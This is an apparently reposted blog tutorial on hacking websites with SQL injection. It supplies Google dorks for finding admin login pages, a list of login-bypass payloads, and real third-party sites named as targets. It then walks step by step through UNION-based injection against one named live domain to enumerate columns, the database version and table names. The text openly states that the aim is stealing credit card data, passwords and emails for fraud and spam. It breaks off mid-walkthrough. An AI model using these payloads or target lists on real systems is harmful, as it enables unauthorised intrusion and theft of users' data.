Firstly, SQL Stands for Structured Query Language. It is the first step anyone should take when wanting to hack a website - it's power to manipulate a website to do what an attacker wants is unbelievable and fantastic. Unlike other Hacking methods, hacking via SQL Injection is quite advanced and does take a bit of background knowledge to perform. It's simple yet advanced and gives you great pleasure if done manually. When you "Inject" you basically just extract information from tables or columns. Though it might sound fun, I recommend staying protected as this could lead to up to 1 year Jail time - even more.
============================================
What Can You Do With It?
With SQL Injection you can easily extract information that is of vital importance to you. This could be anything such as
CC Information
Passwords
Emails
General Information
The emails can be used for mass spreading, the CC Infromation can be used for cash stealing and the Passwords can be used for logging in. Unlike XSS, certain things can go wrong when injecting your vulnerable website. Since most websites remain outdated, it is a Website Hackers gift to hack the countless amount of vulnerable websites - but it takes work. A lot of work. If a website is vulnerable - you might not know if it's prone to normal SQL Injection, Blind SQL Injection or time based SQL Injection. Yes, there are more then one type of SQL Injection. But for now, we'll save you the stress and continue going about SQL Injection.
Note: This guide does NOT cover Blind SQL Injection or any other injection other then the normal.
============================================
ASP Hacking
Well now that we know what SQL Injection is and what it stands for, there is quite an easier method to hacking a website though it is not always successfully done. Let's take ASP first. ASP is quite an easy extension to hack as it involves an attacker using default input which can sometimes confuse the database until giving it complete control. Below, we'll explain how this is done.
First, we want to look up some good Google Dorks. What dorks do is easily search for something you are looking for such as a .php?id= or an .php?admin= or whatever. Simpler put: It's easier then to go to a website and look for a page which has something like .php?id=. Some good ones are:
Quote:"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Now when we have connected to the website, it should have a the Admin page opened with Username and Password input. Something like this:
![[Hình: aspsiteadmin.jpg]](http://img843.imageshack.us/img843/842/aspsiteadmin.jpg)
Now, we have to get a list of default ASP Passwords, which can be found in the list below.
Quote:
Mã:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'*The Admin username should be "admin"
Now let's take a brief background check on the 1's. Let's take 0 and 1 for example. 0 would mean "No" and 1 would mean "Yes". Now if you know Binary, you should know this. Take
Quote:
Mã:
' or '1'='1.
Basically, once put into the site, the database would digest:
"Well it could be ' which would let me login this user, but there is a problem, I'll take '1' too."
This is only done with websites that are of low security and outdated. You won't find any luck on those websites with top security.
Finding SQL Vulnerable Websites
To find a SQL Vulnerable website, like ASP we are going to search for a dork. There are a lot of dorks to get, and an example would be
Quote:inurl:page.php?id=
Because what this basically does is find and list websites with page.php?id=, as said before, this is what a dork is for. So what we will be doing is using a dork in order to find a vulnerable website. You probably won't get lucky the first few tries, but keep it up and you will be an ace. To help you out, here are some vulnerable websites:
Quote:http://www.lanation.gouv.bj/affiche_page.php?id_page=31
http://www.vcan.cc/vcan/newvcan/productshow.php?id=279
http://www.ving.cc/readNews.php?id=343
http://www.0459.cc/readnews.php?id=232138
http://news.9518.cc/news.php?id=24
http://www.maverickentertainment.cc/pres...?NewsID=63
Now that that is out of the way, let's get into injection.
============================================
Injection
Okay, firstly in order to test a website if it is vulnerable or not we have to put in a ' - this is known as a "comment" which will trigger a MySQL error (if it is vulnerable). So, you would have this in your URL:
*Use http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 to practise
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10'
If the website is vulnerable, you'll get an error regarding MySQL .. on line .... - the error varies from website to website. The page will look something like this:
![[Hình: vulnerror.jpg]](http://img138.imageshack.us/img138/2420/vulnerror.jpg)
Finding Columns
Now you will have to find the list of columns to the vulnerable website. To do this, you will use a simple comment which is
Code:
Order by [number] --
Until you get an error. The easiest way to do this is by going to numbers like 15, 20, 25. If you get en error it means you should check numbers lower then the above until a page loads perfectly, and then in the next number sequence the page has an error.
So it would basically be like this:
Code:
Order by 10-- (No Error)
Order by 11-- (No Error)
Order by 12-- (Error)
This would mean the page has 11 columns as we have experienced an error on the 12.
==
Finding Vulnerable Columns
Okay now we have the columns, but we need to know which one of those columns are vulnerable to get the information out of. In order to do this, before the integer (in our case which is 10) we have to put a - sign before it. So it would be
Code:
http://www.leadacidbatteryinfo.org/newsd...php?id=-10
Now that you have put in the - before the Integer, we need to select the columns that had no error. To do this, we are going to be putting in
Code:
union all select 1,2,3,4... (the number of columns)--
So it would be
Code:
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4... (the number of columns)--
Not forgetting to add "--" at the end of the last number. This will trigger the system to give you a list of vulnerable columns that you will be using to extract the information, like so:
![[Hình: vulncolumns.jpg]](http://img22.imageshack.us/img22/6849/vulncolumns.jpg)
Getting DB Version
We now have the vulnerable columns, but we need to know the DB Version because if it is lower then 5.0 then we will have to guess the table names (which takes a fucking long time). So Protip would be to only inject into websites which DB = 5.0 +.
Okay, so we have found our vulnerable columns, to find the database, we are going to use those columns to extract the database version. So to do that we simply add in a "@@version" to one of the vulnerable columns, still keeping the original number of columns we did with the union select all comment.
Note: Let's say we have 5 columns vulnerable, and the columns 2 and 3 show as the ones we can use to extract information, we still need to put in the full 1,2,@@version,4,5--to get the database (You can choose either 2 or 3 to put in the @@version, it doesn't matter.
Okay so basically what we are going to be typing is
Code:
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--
Because we had 11 vulnerable columns and 8 was the one we wanted to use to find the DB. If you have followed it correctly, it should look like this:
![[Hình: dbversion.jpg]](http://img34.imageshack.us/img34/253/dbversion.jpg)
We got 5.0.77 which is higher then 5 so we can gradually continue.
==
Getting Table Names
We now need to get the table names. So to do this, we replace "@@version" with "table_name" and after the last number add "from information_schema.tables" along with a "--". This will give us the Table names which will be shown. So basically what you're going to do is remove the "@@version" which was put in place of one of the vulnerable columns that was shown on the screen, and add "table_name".
Like this:
Code:
http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--
0 nhận xét:
Đăng nhận xét